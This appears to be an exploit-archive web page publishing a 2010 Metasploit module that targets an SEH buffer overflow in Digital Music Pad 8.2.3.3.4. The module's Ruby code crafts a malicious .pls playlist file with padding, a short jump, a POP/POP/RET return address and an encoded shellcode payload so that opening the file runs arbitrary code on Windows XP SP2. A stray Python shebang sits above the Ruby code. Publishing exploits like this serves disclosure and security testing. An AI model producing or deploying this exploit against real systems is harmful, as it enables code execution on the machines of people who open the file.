Digital Music Pad 8.2.3.3.4 SEH Overflow

Digital Music Pad 8.2.3.3.4 SEH Overflow: Posted Sep 28, 2010; Authored by Abhishek Lyall | Site metasploit.com; This Metasploit module exploits a buffer overflow in Digital Music Pad version 8.2.3.3.4. When opening a malicious pls file with the Digital Music Pad, a remote attacker could overflow a buffer and execute arbitrary code.; tags | exploit, remote, overflow, arbitrary; SHA-256 | c83e3567292eff21aaad95afae42e3f474e2698dbe7d9a97597f09520029f64d; Download | Favorite | View

Digital Music Pad 8.2.3.3.4 SEH Overflow

#Digital Music Pad Version 8.2.3.3.4 SEH overflow Metasploit Module
#Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com
#Web - http://www.aslitsecurity.com/
#Blog - http://www.aslitsecurity.blogspot.com/
#Download Vulnerable application from http://www.e-soft.co.uk/DigitalMusicPad82334Setup.exe
#Vulnerable versionDigital Music Pad Version 8.2.3.3.4
#Tested on XP SP2
#Greets Corelan Team, Puneet Jain ASL IT SECURITY TEAM
#!/usr/bin/python
 


require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking
 
    include Msf::Exploit::FILEFORMAT
    include Msf::Exploit::Remote::Seh
 
    def initialize(info = {})
        super(update_info(info,
            'Name' => 'Digital Music Pad Version 8.2.3.3.4 SEH overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in Digital Music Pad Version 8.2.3.3.4 
        When opening a malicious pls file with the Digital Music Pad,
        a remote attacker could overflow a buffer and execute
        arbitrary code.
      },

            'License' => MSF_LICENSE,
            'Author' => 'Abhishek Lyall',
            'References' =>
                [
                    [ 'OSVDB', '' ],
                    
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Payload' =>
                {
                    'Space' => 4720,
                    'BadChars' => "\x00\x20\x0a\x0d",
                    'DisableNops' => 'True',
                },
            'Platform' => 'win',
            'Targets' =>
                [
                    [ 'Windows XP SP2', { 'Ret' => 0x73421DEF} ], # p/p/r msvbvm60.dll
 
                ],
            'Privileged' => false,
            'DefaultTarget' => 0))
 
        register_options(
            [
                OptString.new('FILENAME', [ false, 'The file name.', 'msf.pls']),
            ], self.class)
    end
 
 
    def exploit
 
    
      sploit = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0D\x0A\x46\x69\x6C\x65\x31\x3D" #PLS Header
        sploit << rand_text_alphanumeric(260)
        sploit << "\xeb\x06\x90\x90"            # short jump 6 bytes
        sploit << [target.ret].pack('V')
        sploit << "\x90" * 12                   # nop sled
        sploit << payload.encoded
    sploit << "\x90" * (4720 - payload.encoded.length)
 
        print_status("Creating '#{datastore['FILENAME']}' file ...")
        file_create(sploit)
 
    end
 
end

Top Authors In Last 30 Days

Red Hat 229 files
Ubuntu 84 files
Gentoo 24 files
Debian 20 files
Google Security Research 17 files
Mirabbas Agalarov 16 files
CraCkEr 12 files
Ivan Fratric 8 files
Ahmet Umit Bayram 7 files
nu11secur1ty 7 files

File Archives

Systems

AIX (428)
Apple (1,970)
BSD (373)
CentOS (57)
Cisco (1,920)
Debian (6,748)
Fedora (1,691)
FreeBSD (1,244)
Gentoo (4,312)
HPUX (879)
iOS (342)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (45,734)
Mac OS X (685)
Mandriva (3,105)
NetBSD (256)
OpenBSD (482)
RedHat (13,304)
Slackware (941)
Solaris (1,610)
SUSE (1,444)
Ubuntu (8,605)
UNIX (9,232)
UnixWare (186)
Windows (6,555)
Other

Digital Music Pad 8.2.3.3.4 SEH Overflow

Digital Music Pad 8.2.3.3.4 SEH Overflow

File Archive:

May 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Digital Music Pad 8.2.3.3.4 SEH Overflow

Share This

Digital Music Pad 8.2.3.3.4 SEH Overflow

File Archive:

May 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems